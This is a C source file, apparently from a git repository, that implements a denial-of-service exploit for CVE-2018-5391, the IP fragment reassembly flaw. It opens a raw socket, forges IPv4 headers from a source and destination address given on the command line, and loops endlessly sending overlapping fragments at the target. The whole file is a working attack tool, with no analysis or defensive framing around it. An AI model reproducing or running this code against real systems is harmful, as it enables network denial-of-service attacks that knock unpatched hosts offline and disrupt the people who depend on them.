aboutsummaryrefslogtreecommitdiff
path: root/cve-2018-5391.c
blob: 0bfa2f449de49a6e29b337cdb4f67e614061a196 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <assert.h>
#include <errno.h>

#define PKG_BUF 2048


static inline void die_on_error(const char *err_prefix, int ret)
{
    if (ret) {
        if (errno)
            perror(err_prefix);
        abort();
    }
}

static unsigned short csum(unsigned short *ptr, int nbytes) 
{
    long sum;
    unsigned short oddbyte;
    short answer;

    sum = 0;

    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    if (nbytes == 1) {
        oddbyte = 0;
        *((u_char*) &oddbyte) =* (u_char*) ptr;
        sum += oddbyte;
    }

    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    answer = (short) ~sum;

    return(answer);
}

int main(int argc, char **argv)
{
    unsigned char pkg[PKG_BUF];
    struct iphdr *ip = (struct iphdr *) pkg;
    struct sockaddr_in dest;
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    int r, val = 1;
    size_t data_size = 896 - sizeof *ip;
    useconds_t send_rate = 1 * 1000; /* 50ms */
    size_t cur_frags, max_frags = 64;
    uint16_t id, max_bucket = 32;

    die_on_error("socket", s < 0);

    r = setsockopt(s, IPPROTO_IP, IP_HDRINCL, &val, sizeof val);
    die_on_error("setsockopt", r != 0);

    if (argc != 3) {
        printf("usage: %s [SOURCE-IP] [DEST-IP]\n", (argc > 0 ? argv[0] : "./dos"));
        return 1;
    }
    printf("smack: %s -> %s\n", argv[1], argv[2]);

    memset(&dest, 0, sizeof dest);
    memset(pkg, 0, sizeof pkg);

    ip->ihl = 5;
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = data_size - sizeof(struct iphdr);
    assert(ip->tot_len <= PKG_BUF);
    ip->id = 0;
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_IP;
    ip->check = 0;
    ip->saddr = inet_addr(argv[1]);
    ip->daddr = inet_addr(argv[2]);
    ip->check = csum((unsigned short *) pkg, sizeof *ip);

    dest.sin_family = AF_INET;
    dest.sin_addr.s_addr = inet_addr(argv[2]);

    srandom(time(NULL));
    cur_frags = 0;
    while (1) {
        if (cur_frags % max_frags == 0) {
            ip->frag_off &= 0xFF1F;
            id = ip->id;
            for (uint16_t i = 0; i < max_bucket; ++i) { 
                ip->id = htons(id + i);
                r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest);
                die_on_error("sendto", r != ip->tot_len);
            }
            ip->id = id;

            ip->id = (uint16_t) random();
            ip->frag_off = 0x0020;
            printf("ip->id = %u\n", ip->id);
        }

        //ip->saddr = (uint32_t) random();
        id = ip->id;
        for (uint16_t i = 0; i < max_bucket; ++i) {
            ip->id = htons(id + i);
            r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest);
            die_on_error("sendto", r != ip->tot_len);
        }
        ip->id = id;

        usleep(send_rate);
        printf("%zu: ipd->id = %04X , ip->frag_off = %04X\n", cur_frags,
            ip->id, ntohs(ip->frag_off));
        ip->frag_off += htons(8);
        cur_frags++;
    }

    return 0;
}